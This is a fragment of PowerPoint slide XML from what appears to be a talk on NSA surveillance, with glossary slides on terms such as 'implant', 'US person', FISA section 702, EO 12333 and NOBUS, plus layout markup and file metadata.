                <a:spcPts val="499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282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Email address, phone #, etc…</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2820" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Fingerprint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 NIDS match</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Implant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Malcode or other piece of sabotage</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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 person: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Either a US citizen </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1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or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someone in the US (also effectively UK, Canada, Australia, and New Zealand).  </a:t>
            </a:r>
            <a:br/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They </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1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promise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not to spy on you without paperwork (which they can easily get from a secret court)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="320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Still record all your communications “just in case”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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FAA 702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FISA (Foreign Intelligence Surveillance Act) Amendments Act section 702:</a:t>
            </a:r>
            <a:br/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aren’t a “US person”, outside the US, we can get what we want from within the US</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-500400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1301"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="033bff"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/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EO12333</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4230" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="751680" indent="-505440">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="901"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="033bff"/>
              </a:buClr>
              <a:buSzPct val="125000"/>
              <a:buFont typeface="Symbol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You aren’t a “US person” and this is outside the US, anything goes!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 descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="8583" t="33273" r="5660" b="30324"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4179960" y="5765760"/>
            <a:ext cx="16009560" cy="5328360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1260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Not NOBUS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(Nobody But Us)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8" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2797200" y="2999520"/>
            <a:ext cx="18786600" cy="10856880"/>
            <a:chOff x="2797200" y="2999520"/>
            <a:chExt cx="18786600" cy="10856880"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="119" name="Line" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="19840800">
              <a:off x="1857960" y="8240400"/>
              <a:ext cx="20903400" cy="378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Line" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="1770600">
              <a:off x="1504080" y="8238600"/>
              <a:ext cx="21372840" cy="378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1" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17047440" y="13130640"/>
            <a:ext cx="3290760" cy="50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US Navy Photograph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95720" y="135360"/>
            <a:ext cx="23443920" cy="264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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr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Not About Needles</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="7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 Haystacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="78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23878800" y="13098960"/>
            <a:ext cx="305280" cy="496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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18179280" y="13130640"/>
            <a:ext cx="2701080" cy="50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Wikimedia Photo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554480" y="3066480"/>
            <a:ext cx="19324080" cy="1060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2019-08-08T10:41:33Z</dcterms:modified>
  <cp:revision>27</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>